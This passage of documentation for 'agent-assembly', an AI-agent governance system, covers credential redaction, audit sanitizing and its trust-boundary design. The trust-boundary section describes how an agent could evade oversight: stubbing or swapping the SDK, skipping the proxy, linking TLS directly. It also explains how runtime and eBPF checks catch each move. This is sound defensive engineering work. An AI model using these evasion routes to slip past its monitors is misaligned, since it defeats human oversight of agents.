Unscannable field → redact whole. In the runtime enforcement stage, a secret-bearing field larger than max_field_bytes (default DEFAULT_MAX_FIELD_BYTES = 64 KiB) cannot be fully scanned, so it is replaced wholesale with OVERSIZED_MARKER = "[REDACTED:OVERSIZED]" rather than forwarded raw — OversizedPolicy::RedactWhole, the sole and default variant (aa-runtime/src/pipeline/enforcement.rs). The doc comment is explicit: “The runtime is a security gate, so the policy is fail-closed.”
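The oversized-field rule is small enough to sketch directly. The constant names and marker string come from the text above; the `enforce_field_cap` helper is hypothetical and only illustrates the redact-whole behavior.

```rust
/// Default cap on a secret-bearing field, as stated above (64 KiB).
pub const DEFAULT_MAX_FIELD_BYTES: usize = 64 * 1024;

/// Marker that replaces a field too large to scan.
pub const OVERSIZED_MARKER: &str = "[REDACTED:OVERSIZED]";

/// Replaces `field` wholesale when it exceeds `max_field_bytes`.
/// Returns `true` if the field was replaced. (Hypothetical helper.)
pub fn enforce_field_cap(field: &mut String, max_field_bytes: usize) -> bool {
    if field.len() > max_field_bytes {
        // Fail closed: never forward bytes that were not scanned.
        *field = OVERSIZED_MARKER.to_string();
        true
    } else {
        false
    }
}
```

A field of exactly `max_field_bytes` is left for the scanner in this sketch; whether the real boundary is inclusive is an assumption.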

Null-as-no-match nuance. Inside a single policy document, an unresolvable graph variable contributes nothing to the decision — a deny condition that references it does not fire (aa-gateway/src/policy/context.rs). This is a deliberate per-clause evaluation rule (fail-open on missing context within a clause), distinct from the system-level fail-closed default that governs the absence of any policy.
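One way to picture the per-clause rule is an equality clause over a variable map, where a missing variable is simply "no match". `DenyIfEquals` and its fields are hypothetical; the real clause types live in the policy module and may look quite different.

```rust
use std::collections::HashMap;

/// A deny condition of the form "deny if <variable> equals <value>" (hypothetical).
#[derive(Debug, Clone)]
pub struct DenyIfEquals {
    pub variable: String,
    pub value: String,
}

impl DenyIfEquals {
    /// Returns `true` only when the variable resolves and matches.
    /// An unresolvable variable contributes nothing: the clause does not fire.
    pub fn fires(&self, resolved: &HashMap<String, String>) -> bool {
        match resolved.get(&self.variable) {
            Some(actual) => actual.as_str() == self.value.as_str(),
            None => false,
        }
    }
}
```

Note that this is the within-clause behavior only; an empty policy cascade is still denied at the system level.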

Network-egress control

Egress is enforced at two tiers. In the gateway, check_network_egress(host, policy) returns an EgressDecision against the policy’s allowlist (aa-gateway/src/policy/network.rs); a NetworkRequest to a host outside a non-empty allowlist is denied at Stage 2. At the wire, the proxy independently enforces egress on decrypted traffic with no agent code change (see Three-layer defense), and the eBPF SSL uprobes observe egress plaintext even when the proxy is bypassed.
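The gateway-tier check might look roughly like this. It is a sketch under several assumptions: the real `check_network_egress` takes a policy rather than a bare slice, the variant names of `EgressDecision` are invented here, hosts are compared exactly (ignoring ASCII case), and an empty allowlist is treated as "no restriction" because the text only describes denial for a non-empty one.

```rust
/// Illustrative variants; the real `EgressDecision` may differ.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum EgressDecision {
    Allowed,
    Denied { host: String },
}

/// Checks `host` against an allowlist of exact host names.
pub fn check_network_egress(host: &str, allowlist: &[&str]) -> EgressDecision {
    // Assumption: an empty allowlist means egress is unrestricted.
    if allowlist.is_empty() {
        return EgressDecision::Allowed;
    }
    if allowlist.iter().any(|allowed| allowed.eq_ignore_ascii_case(host)) {
        EgressDecision::Allowed
    } else {
        EgressDecision::Denied { host: host.to_string() }
    }
}
```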

Credential scanning & redaction (`aa-security`)

The aa-security leaf crate is the credential-detection and redaction primitive (extracted from aa-core per ADR 0002, AAASM-2567). Its CredentialScanner (aa-security/src/scanner.rs) compiles a single Aho-Corasick automaton over literal secret prefixes and patterns, mapping each match to a CredentialKind:

LLM-provider keys (Anthropic, OpenAI),
cloud keys (AKIA… AWS access key, GCP service account, Azure connection string),
VCS tokens (ghp_ PAT, ghs_ app token),
Slack tokens, database URLs (postgres, mysql, mongodb),
private-key PEM blocks (RSA / EC / OpenSSH / generic / PGP).

A scan yields a ScanResult; redact() replaces each match with a [REDACTED:<kind>] label, and the resulting Redaction (aa-security/src/redaction.rs) stores only finding metadata — never the raw secret value.
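To make the scan-then-redact flow concrete, here is a deliberately simplified, standard-library-only sketch. It swaps the Aho-Corasick automaton for a naive prefix search, covers just three of the prefixes listed above, and treats a secret as running to the next whitespace. The `Finding` type, the label strings, and both function signatures are assumptions for illustration, not the `aa-security` API.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum CredentialKind {
    AwsAccessKey,
    GithubPat,
    GithubAppToken,
}

impl CredentialKind {
    /// Label used inside the redaction marker (hypothetical spelling).
    fn label(self) -> &'static str {
        match self {
            CredentialKind::AwsAccessKey => "aws_access_key",
            CredentialKind::GithubPat => "github_pat",
            CredentialKind::GithubAppToken => "github_app_token",
        }
    }
}

const PREFIXES: &[(&str, CredentialKind)] = &[
    ("AKIA", CredentialKind::AwsAccessKey),
    ("ghp_", CredentialKind::GithubPat),
    ("ghs_", CredentialKind::GithubAppToken),
];

/// Metadata only: kind, byte offset, and length. The raw secret is never stored.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub kind: CredentialKind,
    pub offset: usize,
    pub len: usize,
}

/// Finds secrets left to right; each match runs from its prefix to the next whitespace.
pub fn scan(text: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    let mut pos = 0;
    while pos < text.len() {
        let rest = &text[pos..];
        // Earliest occurrence of any known prefix in the remaining text.
        let hit = PREFIXES
            .iter()
            .filter_map(|(prefix, kind)| rest.find(*prefix).map(|i| (i, *kind)))
            .min_by_key(|(i, _)| *i);
        let (rel, kind) = match hit {
            Some(found) => found,
            None => break,
        };
        let start = pos + rel;
        let len = text[start..]
            .find(char::is_whitespace)
            .unwrap_or(text.len() - start);
        findings.push(Finding { kind, offset: start, len });
        pos = start + len;
    }
    findings
}

/// Replaces every finding with a `[REDACTED:<kind>]` label.
pub fn redact(text: &str, findings: &[Finding]) -> String {
    let mut out = String::with_capacity(text.len());
    let mut cursor = 0;
    for finding in findings {
        out.push_str(&text[cursor..finding.offset]);
        out.push_str("[REDACTED:");
        out.push_str(finding.kind.label());
        out.push(']');
        cursor = finding.offset + finding.len;
    }
    out.push_str(&text[cursor..]);
    out
}
```

The property worth noticing is that `Finding` has no field that could hold the secret, so code that logs findings cannot leak the value by accident.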

The same crate is wired in at every trusted point:

Caller	Role
`aa-runtime` (`pipeline/enforcement.rs`, `RuntimeScanner::enforce`)	Authoritative — re-scans every event unconditionally on both the batch and the violation path
`aa-gateway` (`engine/mod.rs` Stage 6, `audit.rs`)	Scan-then-redact at evaluation and at the audit-write boundary
`aa-proxy` (`intercept/mod.rs`)	Wire-level scan driving `Block` / `ForwardRedacted`
SDK / `aa-sdk-client`	Advisory preflight only — best effort, never trusted

The runtime’s RuntimeScanner holds one precompiled scanner, built once at pipeline start and reused per event — it is never rebuilt per event — and only the allowlisted secret-bearing fields of each Detail variant (ToolCall, FileOp, Process) are scanned. Variants with no free-text secret fields (LlmCall, Network, Violation, Approval) are matched explicitly with no wildcard, so adding a new detail variant fails to compile until its secret-bearing fields are triaged.
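The compile-time guard relies on an ordinary Rust property: a `match` with no wildcard arm must name every variant. A minimal sketch, assuming invented field names (`args`, `path`, `command_line`) and unit-like variants for the kinds that carry no free-text secrets:

```rust
/// Variant names follow the text; the fields are hypothetical.
#[derive(Debug)]
pub enum Detail {
    ToolCall { args: String },
    FileOp { path: String },
    Process { command_line: String },
    LlmCall,
    Network,
    Violation,
    Approval,
}

/// Returns the fields that must be scanned for this event detail.
pub fn secret_bearing_fields(detail: &mut Detail) -> Vec<&mut String> {
    // No `_ =>` arm: adding a variant to `Detail` makes this match
    // non-exhaustive, so the crate stops compiling until it is triaged here.
    match detail {
        Detail::ToolCall { args } => vec![args],
        Detail::FileOp { path } => vec![path],
        Detail::Process { command_line } => vec![command_line],
        Detail::LlmCall | Detail::Network | Detail::Violation | Detail::Approval => Vec::new(),
    }
}
```

Returning mutable references lets the caller scan and redact in place without knowing which variant it holds.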

Budgets as a control

Budgets are a first-class security control against runaway spend, not merely a cost report. The gateway’s BudgetTracker (aa-gateway/src/budget/) tracks per-agent, per-team, and per-org daily/monthly spend. At Stage 7 the engine checks monthly then daily limits; on exceed it returns a Deny whose side-effect is driven by the policy’s action_on_exceed:

ActionOnExceed::Deny — refuse the individual request, keep the agent active;
ActionOnExceed::Suspend — attach DenyAction::SuspendAgent so the service layer suspends the agent.

The default when action_on_exceed is absent is Deny (aa-gateway/src/policy/validator.rs).
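A sketch of the Stage 7 outcome, assuming spend is tracked in integer cents and that "exceed" means strictly greater than the limit. `Window`, `BudgetDeny`, and `check_budget` are hypothetical; `ActionOnExceed` and `DenyAction::SuspendAgent` are the names used above.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
pub enum ActionOnExceed {
    /// The default when the policy leaves `action_on_exceed` unset.
    #[default]
    Deny,
    Suspend,
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum DenyAction {
    SuspendAgent,
}

/// Result of a budget violation (hypothetical shape).
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct BudgetDeny {
    pub reason: String,
    pub action: Option<DenyAction>,
}

/// Spend and limit for one window, in cents (hypothetical type).
#[derive(Debug, Clone, Copy)]
pub struct Window {
    pub spent_cents: u64,
    pub limit_cents: u64,
}

/// Checks the monthly window, then the daily one; `None` means within budget.
pub fn check_budget(
    monthly: Window,
    daily: Window,
    on_exceed: Option<ActionOnExceed>,
) -> Option<BudgetDeny> {
    let exceeded = [monthly, daily]
        .iter()
        .any(|window| window.spent_cents > window.limit_cents);
    if !exceeded {
        return None;
    }
    let action = match on_exceed.unwrap_or_default() {
        ActionOnExceed::Deny => None,
        ActionOnExceed::Suspend => Some(DenyAction::SuspendAgent),
    };
    Some(BudgetDeny { reason: "budget exceeded".to_string(), action })
}
```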

Decision flow

flowchart TD
    classDef gw fill:#e8f1ff,stroke:#5b8def
    classDef deny fill:#fdecea,stroke:#d75748
    classDef redact fill:#fff3d6,stroke:#c98a00
    classDef allow fill:#eaf6ee,stroke:#3aa55b

    A["GovernanceAction + AgentContext"]:::gw --> Casc{"Policy cascade<br/>empty?"}
    Casc -->|yes| FC["Deny — fail-closed<br/>'no policy'"]:::deny
    Casc -->|no| S1["1 Schedule"]:::gw --> S2["2 Network allowlist"]:::gw
    S2 --> S3["3 Tool allow/deny"]:::gw --> S4["4 Rate limit"]:::gw
    S4 --> S5{"5 Requires<br/>approval?"}
    S5 -->|yes| RA["RequireApproval"]:::redact
    S5 -->|no| S6["6 Credential scan<br/>(aa-security)"]:::redact
    S6 -->|finding| RED["Redact in memory<br/>[REDACTED:kind] — proceed"]:::redact
    S6 -->|clean| S7{"7 Budget<br/>exceeded?"}
    RED --> S7
    S7 -->|"yes / Deny"| BD["Deny 'budget exceeded'"]:::deny
    S7 -->|"yes / Suspend"| SUS["Deny + SuspendAgent"]:::deny
    S7 -->|no| OK["Allow"]:::allow

    S1 -.->|outside hours| D1["Deny"]:::deny
    S2 -.->|host not allowed| D2["Deny"]:::deny
    S3 -.->|tool denied| D3["Deny"]:::deny
    S4 -.->|over limit| D4["Deny"]:::deny

Trust boundaries

The single most important decision in Agent Assembly’s Security Model is where it places trust. The answer is recorded formally in ADR 0002 — SDK Security Boundary: the SDK is not a trust boundary; the runtime and gateway are authoritative. This page explains why, and how that decision is made bypass-resistant.

Why the SDK is not a trust boundary

The fastest interception layer, the SDK, runs inside the agent’s own process, which is exactly the component the model does not trust (see the threat model). An attacker who controls the agent can swap in a modified, outdated, or stubbed SDK. Any guarantee anchored in the SDK is therefore no guarantee at all: security must hold even when the SDK does nothing.

ADR 0002 audited the prior state and found enforcement in the wrong place — the only credential scan on the SDK fast-path was inside the SDK binding itself, while the trusted runtime forwarded the SDK’s payload without independently scanning it. A removed or bypassed SDK scanner would let raw secrets flow SDK → runtime → gateway. The decision reversed this:

Concern	Decision
Is the SDK a security boundary?	No. The SDK is untrusted.
Authoritative enforcement point	`aa-runtime` — scans, redacts, normalizes every event before forward/audit, unconditionally.
Source of truth	Gateway / control-plane — policy SoT; audit-write sanitizer as final backstop.
SDK-side detection	Best-effort advisory preflight only. No `clean` / `already_scanned` marker exists on the wire, and none is honored.

Invariant. Nothing the SDK asserts can shorten the runtime’s work. The same aa-security scanner is advisory inside the SDK and authoritative inside aa-runtime. Position — not code — confers authority.

Why the runtime / gateway is authoritative

The SDK event fast-path is SDK → UDS → aa-runtime → gRPC → gateway. The runtime is the mandatory chokepoint: every event must pass through it. So that is where the authoritative work lives. RuntimeScanner::enforce (aa-runtime/src/pipeline/enforcement.rs) scans, redacts, and normalizes every secret-bearing field, and the pipeline run() loop (aa-runtime/src/pipeline/mod.rs) calls it before any forward or audit, on every path — both the batched path and the immediate policy-violation path. Its doc comment states the rule directly:

Runs unconditionally — no field of the event can request that scanning be skipped, and there is no SDK trust marker on the wire.

The gateway, in turn, is the source of truth for policy (the agent cannot author its own policy) and applies a final write-boundary sanitizer before anything is persisted.
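The shape of the runtime rule, "scrub first, then route", can be sketched like this. The `Event` and `Forwarded` types and the `run` signature are simplified stand-ins, not the real `aa_runtime::pipeline::run`; the scrubber is passed in as a closure so the sketch stays independent of any scanner.

```rust
/// Simplified event: one secret-bearing payload plus a routing flag (hypothetical).
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Event {
    pub payload: String,
    pub is_violation: bool,
}

/// Where scrubbed events end up (hypothetical).
#[derive(Debug, Default)]
pub struct Forwarded {
    pub batched: Vec<Event>,
    pub immediate: Vec<Event>,
}

/// Scrubs every event before routing it; no field of the event can opt out.
pub fn run<S>(events: Vec<Event>, scrub: S) -> Forwarded
where
    S: Fn(&str) -> String,
{
    let mut out = Forwarded::default();
    for mut event in events {
        // Enforcement happens before the path is even chosen.
        event.payload = scrub(&event.payload);
        if event.is_violation {
            out.immediate.push(event);
        } else {
            out.batched.push(event);
        }
    }
    out
}
```

Because the scrub call sits above the branch, there is no code path that reaches either output without passing through it.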

Bypass resistance — eBPF catches what the SDK and proxy miss

Trust placement answers “what if the SDK lies?” Bypass resistance answers “what if the agent skips the SDK entirely?” The three-layer model is the structural answer: an action that evades a higher layer simply surfaces at a lower one. An agent that skips the SDK and the proxy and links TLS directly is still observed by the eBPF SSL_write / SSL_read uprobes and exec/file syscall hooks (aa-ebpf-probes/src/ssl_probes.rs, aa-ebpf-probes/src/exec_probes.rs), because the kernel sits below anything the agent can reach.

This is verified, not asserted. The bypass-resistance suite drives the public aa_runtime::pipeline::run loop end-to-end and proves every inbound event is scanned + redacted before forward/audit on both paths, with the raw secret never leaving the runtime regardless of SDK behavior (aa-runtime/tests/aaasm_2568_gate_verification.rs). The “no trust marker” guard is partly compile-time — the exhaustive, wildcard-free match over Detail variants forces any new secret-bearing field to be triaged before it compiles.

Trust-boundary diagram

flowchart LR
    classDef untrusted fill:#fdecea,stroke:#d75748,stroke-dasharray: 4 3
    classDef trusted fill:#eaf6ee,stroke:#3aa55b
    classDef sot fill:#e8f1ff,stroke:#5b8def

    subgraph U["UNTRUSTED — agent-controllable process"]
        SDK["Python / Node / Go SDK<br/>+ aa-sdk-client shim<br/><i>advisory preflight only</i>"]:::untrusted
    end

    subgraph T["TRUSTED ENFORCEMENT"]
        RT["aa-runtime<br/>mandatory chokepoint<br/>scan · redact · normalize<br/><b>unconditional</b>"]:::trusted
        PX["aa-proxy<br/>wire egress + scan"]:::trusted
        BPF["aa-ebpf<br/>kernel uprobes / syscalls<br/>bypass floor"]:::trusted
    end

    subgraph S["SOURCE OF TRUTH"]
        GW["aa-gateway<br/>policy SoT · budget<br/>audit-write sanitizer"]:::sot
    end

    SDK -->|"UDS · no trust marker"| RT
    PX --> RT
    BPF --> RT
    RT -->|"gRPC"| GW

    %% the boundary line
    SDK -. "trust boundary" .-> RT

Everything left of the runtime is untrusted and can only advise; everything from the runtime rightward is authoritative. The dashed edge is the trust boundary itself — the SDK’s assertions stop there. See ADR 0002 for the full decision record and the boundary-first migration order that ensured SDK-side scanning was never removed before the runtime became authoritative.

Audit and assurance

Governance is only credible if there is a trustworthy record of what happened. Agent Assembly’s audit pipeline is designed so that the trail is free of secrets, tamper-evident, and supports non-repudiation — even when an upstream sender (an SDK, a proxy, an eBPF probe) emits something it should not. This page covers the write-boundary sanitizer, redaction, and the publish path. For where audit sits in the wider system, see Architecture.

The write-boundary sanitizer

Every audit event the gateway is about to persist passes first through sanitize (aa-gateway/src/sanitizer/). The module’s own description states the principle: “The sender is the first line of defense; this module is the last.” It never trusts the inbound shape — it operates on the untyped JSON tree as received and:

strips banned keys recursively at any depth,
drops unknown top-level fields, counting them so a newly-emitting sender is noticed (a drift signal), and
collapses heartbeats into a single “last seen” update on the agent row instead of writing a per-beat record.

The four classes of “never store” data are removed regardless of what any upstream emits: raw LLM prompts/completions, full tool-call payloads, eBPF packet bodies, and per-heartbeat sequence records. The BANNED_KEYS list (aa-gateway/src/sanitizer/rules.rs) is deliberately a superset — defense in depth means erring toward dropping — and includes prompt, completion, llm_input, llm_output, tool_payload, tool_response, tool_args, tool_result, packet_body, packet_payload, and heartbeat_seq.

The sanitizer returns a SanitizeOutcome — either an Audit(SanitizedAuditEvent) to persist, or a HeartbeatUpdate to fold into the agent’s “last seen” field (aa-gateway/src/sanitizer/event.rs). The SanitizedAuditEvent type is a constructor-guarded wrapper, so a value can only exist after it has been through the banned-key pass.
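The three sanitizer behaviors can be sketched over a tiny hand-rolled JSON tree (the standard library has no JSON type, so `Json` below is a stand-in). The banned keys are the ones listed above; the `KNOWN_TOP_LEVEL` allowlist, the `kind == "heartbeat"` convention, and the `dropped_unknown` counter are assumptions made for this example.

```rust
use std::collections::BTreeMap;

/// Minimal JSON tree, standing in for the untyped value the gateway receives.
#[derive(Debug, Clone, PartialEq)]
pub enum Json {
    Null,
    Bool(bool),
    Num(f64),
    Str(String),
    Arr(Vec<Json>),
    Obj(BTreeMap<String, Json>),
}

pub const BANNED_KEYS: &[&str] = &[
    "prompt", "completion", "llm_input", "llm_output", "tool_payload", "tool_response",
    "tool_args", "tool_result", "packet_body", "packet_payload", "heartbeat_seq",
];

/// Hypothetical allowlist of top-level fields.
pub const KNOWN_TOP_LEVEL: &[&str] = &["kind", "agent_id", "action", "decision"];

/// Only `sanitize` builds this type, so holding one implies the strip has run.
/// (In a real crate the private field is protected by the module boundary.)
#[derive(Debug)]
pub struct SanitizedAuditEvent {
    inner: Json,
    pub dropped_unknown: usize,
}

impl SanitizedAuditEvent {
    pub fn as_json(&self) -> &Json {
        &self.inner
    }
}

#[derive(Debug)]
pub enum SanitizeOutcome {
    Audit(SanitizedAuditEvent),
    HeartbeatUpdate,
}

/// Removes banned keys at any depth.
fn strip_banned(value: &mut Json) {
    match value {
        Json::Obj(map) => {
            map.retain(|key, _| !BANNED_KEYS.iter().any(|banned| *banned == key.as_str()));
            for child in map.values_mut() {
                strip_banned(child);
            }
        }
        Json::Arr(items) => {
            for item in items.iter_mut() {
                strip_banned(item);
            }
        }
        Json::Null | Json::Bool(_) | Json::Num(_) | Json::Str(_) => {}
    }
}

pub fn sanitize(mut event: Json) -> SanitizeOutcome {
    if let Json::Obj(map) = &event {
        // Assumption: heartbeats are tagged with a top-level `kind` field.
        if map.get("kind") == Some(&Json::Str("heartbeat".to_string())) {
            return SanitizeOutcome::HeartbeatUpdate;
        }
    }
    strip_banned(&mut event);
    let mut dropped_unknown = 0;
    if let Json::Obj(map) = &mut event {
        let before = map.len();
        map.retain(|key, _| KNOWN_TOP_LEVEL.iter().any(|known| *known == key.as_str()));
        dropped_unknown = before - map.len();
    }
    SanitizeOutcome::Audit(SanitizedAuditEvent { inner: event, dropped_unknown })
}
```

Counting dropped fields instead of rejecting the event keeps the write path available while still surfacing schema drift.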

Redaction: secrets never reach the record

The sanitizer removes whole banned containers; the aa-security scanner removes secrets that appear inside otherwise-legitimate fields. Both run on the audit path. At the gateway audit-write boundary (aa-gateway/src/audit.rs) the CredentialScanner detects a secret and redact() replaces it with a [REDACTED:<kind>] label; the resulting Redaction (aa-security/src/redaction.rs) stores only finding metadata — kind and offset — never the raw value. Combined with the runtime’s authoritative re-scan (see Protection and enforcement), a secret is redacted before forward and again before persist, so it never lands in audit_logs.

Tamper-evidence and non-repudiation

Audit events are published off the runtime via the NATS audit publisher (aa-runtime/src/audit_publisher/). Each entry is published to a structured, tenant- and agent-scoped subject derived by subject_for (aa-runtime/src/audit_publisher/subject.rs):

assembly.audit.<tenant>.<agent>

where <tenant> is the entry’s org id (falling back to team id, then default) and <agent> is the agent id rendered as a hyphenated UUID. Scoping every record to an immutable tenant+agent identity means a record cannot be silently reattributed, and routing through a durable message bus separates the production of audit evidence (the runtime, which an agent cannot reach into) from its consumption (the gateway/storage), so the trail is not rewritable by the governed party. This separation, plus the constructor-guarded sanitized type and metadata-only redaction, is what makes the record non-repudiable: the governed action and its decision are recorded by trusted components, with no path for the agent to alter or suppress its own history.
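The subject derivation can be sketched in a few lines. The `AuditEntry` shape below (optional org and team ids, a 16-byte agent id) is an assumption for illustration; only the subject layout and the fallback order come from the text.

```rust
/// Hypothetical, trimmed-down audit entry.
#[derive(Debug, Clone)]
pub struct AuditEntry {
    pub org_id: Option<String>,
    pub team_id: Option<String>,
    pub agent_id: [u8; 16],
}

/// Renders 16 bytes as a lowercase hyphenated UUID (8-4-4-4-12).
fn hyphenated(bytes: &[u8; 16]) -> String {
    let hex: String = bytes.iter().map(|b| format!("{b:02x}")).collect();
    format!(
        "{}-{}-{}-{}-{}",
        &hex[0..8],
        &hex[8..12],
        &hex[12..16],
        &hex[16..20],
        &hex[20..32]
    )
}

/// Builds `assembly.audit.<tenant>.<agent>` with the org, team, `default` fallback.
pub fn subject_for(entry: &AuditEntry) -> String {
    let tenant = entry
        .org_id
        .as_deref()
        .or(entry.team_id.as_deref())
        .unwrap_or("default");
    format!("assembly.audit.{}.{}", tenant, hyphenated(&entry.agent_id))
}
```

A real implementation would also need to ensure the tenant token contains no `.` or wildcard characters, since those are meaningful in NATS subjects; this sketch does not validate it.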

End-to-end audit data flow

flowchart TD
    classDef src fill:#eef2ff,stroke:#6366f1
    classDef trusted fill:#eaf6ee,stroke:#3aa55b
    classDef guard fill:#fff3d6,stroke:#c98a00
    classDef store fill:#e8f1ff,stroke:#5b8def

    SDK["SDK (advisory)"]:::src
    PX["aa-proxy"]:::src
    BPF["aa-ebpf"]:::src

    RT["aa-runtime pipeline<br/>RuntimeScanner::enforce<br/>scan · redact · normalize<br/><b>unconditional</b>"]:::trusted
    PUB["audit_publisher<br/>subject assembly.audit.&lt;tenant&gt;.&lt;agent&gt;"]:::trusted
    BUS[["NATS bus<br/>(durable, append-oriented)"]]:::trusted

    SAN["Gateway sanitizer<br/>strip BANNED_KEYS (recursive)<br/>drop unknown top-level (counted)<br/>collapse heartbeats"]:::guard
    RED["aa-security redaction<br/>[REDACTED:kind] · metadata only"]:::guard

    HB["agents.last_heartbeat<br/>update"]:::store
    LOG[("audit_logs<br/>secret-free, attributed")]:::store

    SDK --> RT
    PX --> RT
    BPF --> RT
    RT --> PUB --> BUS --> SAN
    SAN -->|"Audit(SanitizedAuditEvent)"| RED --> LOG
    SAN -->|"HeartbeatUpdate"| HB

The record that reaches audit_logs has passed an authoritative redaction in the runtime, a recursive banned-key strip in the sanitizer, and a final metadata-only credential redaction — and is bound to an immutable tenant+agent subject. No single compromised or careless sender can defeat the trail.

Architecture

This chapter is the engineering map of agent-assembly — the open-source core that governs AI agents by intercepting their actions at three independent layers and routing every action through one central gateway.

It is written for contributors and integrators who want to understand how the system is built, not just how to operate it. For the system-level overview, see System architecture; for the security rationale, see the Security Model.

Pages in this chapter

System architecture — the big picture: the 28 workspace crates, the three interception layers, the gateway / API / runtime / storage split, and the gRPC / HTTP / UDS transport topology, with a mermaid system diagram.
Component deep-dives — a per-crate tour of responsibilities, key types, and dependencies: gateway, policy engine, budgets, runtime, the three interception crates, API, CLI, foundation crates, storage, and cache.
Key workflows — policy evaluation, agent registration, budget tracking & rollup, and the interception/enforcement path, each as a mermaid sequence or flow diagram grounded in the real code path.
Data flows — how an intercepted event travels from a layer through the gateway, the policy engine, and the write-boundary sanitizer into durable, tamper-evident storage.
Building & contributing — build, test, and lint basics for working on the workspace.

The model in one diagram

flowchart LR
    Agent[AI agent] --> Layers["3 interception layers<br/>SDK · proxy · eBPF"]
    Layers --> RT["aa-runtime<br/>chokepoint"]
    RT -->|gRPC :50051| GW["aa-gateway<br/>policy · budget · audit"]
    GW --> Store[("storage")]
    GW --> API["aa-api<br/>HTTP :7700"]
    API --> Dash["dashboard / tooling"]

Start with System architecture.

System architecture

This page is the big-picture map of agent-assembly: the workspace crates, how the three interception layers feed one central gateway, and which transport each component speaks. Read it first; the component deep-dives, key workflows, and data flows pages zoom into each piece.

For the trust-boundary view of the same system — what each layer is trusted to do and where the authoritative checks live — see the Security Model.

The one-sentence model

Agents act; the three interception layers observe those actions and forward them to the gateway; the gateway evaluates policy, tracks budgets, and writes an audit record before returning allow or deny.

The gateway is the single decision-maker. The interception layers differ only in where they sit and how easily an agent can bypass them; they all converge on the same protobuf wire format defined in aa-proto and the same PolicyService RPC.

Workspace at a glance

The Cargo workspace declares 28 member crates in the top-level Cargo.toml. They group into a handful of architectural roles:

Role	Crates	What they own
Foundation	`aa-core`, `aa-proto`, `aa-security`	Domain types (`AgentId`, `AuditEntry`, policy types), the gRPC/protobuf wire schema, and the credential scanner / redaction primitives.
Storage	`aa-storage`, `aa-storage-memory`, `aa-storage-postgres`, `aa-storage-redis`, `aa-storage-sqlite-buffer`, `aa-cache`	Storage trait facade + pluggable drivers, plus the in-process L1 cache.
Runtime / interception	`aa-runtime`, `aa-ebpf`, `aa-ebpf-common`, `aa-proxy`, `aa-sdk-client`, `aa-wasm`, `aa-sandbox`	The per-agent runtime chokepoint, the kernel/proxy/SDK interception layers, the FFI-agnostic SDK client, and the WASM tool sandbox.
Control plane	`aa-gateway`, `aa-api`, `aa-cli`	The governance gateway (gRPC), the HTTP/OpenAPI read API, and the `aasm` operator CLI.
Dev-tool adapters	`aa-devtool`, `aa-devtool-claude-code`, `aa-devtool-codex`, `aa-devtool-copilot`, `aa-devtool-windsurf`, `aa-devtool-saas`, plus the `examples/aa-devtool-sample-myeditor` sample	Adapters that wire common AI dev tools into the governance fabric.
Test / conformance	`conformance`, `aa-integration-tests`	The cross-crate trait conformance harness and the end-to-end integration suite.

Two further eBPF crates — aa-ebpf-probes and aa-ebpf-programs — live alongside the workspace but are intentionally out of workspace: they compile for the bpfel-unknown-none BPF target and are built by aa-ebpf’s build.rs via aya-build, so they cannot be selected with cargo -p.

The per-language SDK shims (Python / Node / Go) do not live in this monorepo. They wrap aa-sdk-client and consume it via a pinned git SHA from the sibling python-sdk / node-sdk / go-sdk repositories.

Crate / component map

The diagram highlights the core architectural crates; storage drivers, dev-tool adapters, and test harnesses are folded into summary nodes for clarity. Edges follow real path dependencies in each crate’s Cargo.toml.

graph TD
    classDef foundation fill:#e8f1ff,stroke:#5b8def
    classDef storage fill:#eef6ff,stroke:#5b8def
    classDef ebpf fill:#fdecea,stroke:#d75748
    classDef ffi fill:#eaf6ee,stroke:#3aa55b
    classDef control fill:#fff3d6,stroke:#c98a00
    classDef outOfWorkspace fill:#fdecea,stroke:#d75748,stroke-dasharray: 5 3

    %% Foundation
    aa_proto[aa-proto<br/><i>wire schema</i>]:::foundation
    aa_core[aa-core<br/><i>domain types</i>]:::foundation
    aa_security[aa-security<br/><i>scanner / redaction</i>]:::foundation

    %% Storage
    aa_storage[aa-storage<br/><i>trait facade</i>]:::storage
    aa_cache[aa-cache<br/><i>L1 cache</i>]:::storage
    storage_drivers["aa-storage-{memory,postgres,<br/>redis,sqlite-buffer}"]:::storage

    %% Interception / runtime
    aa_runtime[aa-runtime<br/><i>per-agent chokepoint</i>]:::ffi
    aa_sdk_client[aa-sdk-client<br/><i>FFI-agnostic client</i>]:::ffi
    aa_wasm[aa-wasm]:::ffi
    aa_sandbox[aa-sandbox<br/><i>WASI tool sandbox</i>]:::ffi
    aa_proxy[aa-proxy<br/><i>L2 sidecar</i>]:::ebpf
    aa_ebpf[aa-ebpf<br/><i>L3 kernel</i>]:::ebpf
    aa_ebpf_common[aa-ebpf-common]:::ebpf
    aa_probes["aa-ebpf-probes /<br/>aa-ebpf-programs<br/><i>out-of-workspace BPF</i>"]:::outOfWorkspace

    %% Control plane
    aa_gateway[aa-gateway<br/><i>gRPC 50051</i>]:::control
    aa_api[aa-api<br/><i>HTTP / OpenAPI</i>]:::control
    aa_cli[aa-cli<br/><i>aasm</i>]:::control

    aa_core --> aa_security
    aa_storage --> aa_core
    aa_cache --> aa_core
    storage_drivers --> aa_storage

    aa_runtime --> aa_core
    aa_runtime --> aa_proto
    aa_runtime --> aa_ebpf
    aa_sdk_client --> aa_proto
    aa_sdk_client -. preflight .-> aa_security
    aa_wasm --> aa_core

    aa_ebpf --> aa_core
    aa_ebpf --> aa_ebpf_common
    aa_probes --> aa_ebpf_common

    aa_proxy --> aa_core
    aa_proxy --> aa_proto
    aa_proxy --> aa_runtime
    aa_proxy --> aa_sandbox

    aa_gateway --> aa_core
    aa_gateway --> aa_proto
    aa_gateway --> aa_runtime
    aa_gateway --> aa_storage
    aa_gateway --> aa_cache
    aa_api --> aa_core
    aa_api --> aa_gateway
    aa_api --> aa_runtime
    aa_cli --> aa_core
    aa_cli --> aa_gateway

aa-core and aa-proto are the two foundation crates everything else builds on: aa-core holds the Rust domain model and the storage traits, aa-proto holds the protobuf schema that crosses every process boundary. As the diagram shows, aa-core in turn depends on the aa-security leaf crate.

How the layers, gateway, API, runtime, and storage fit together

flowchart TB
    subgraph agent_host["Agent host"]
        Agent[AI agent process]
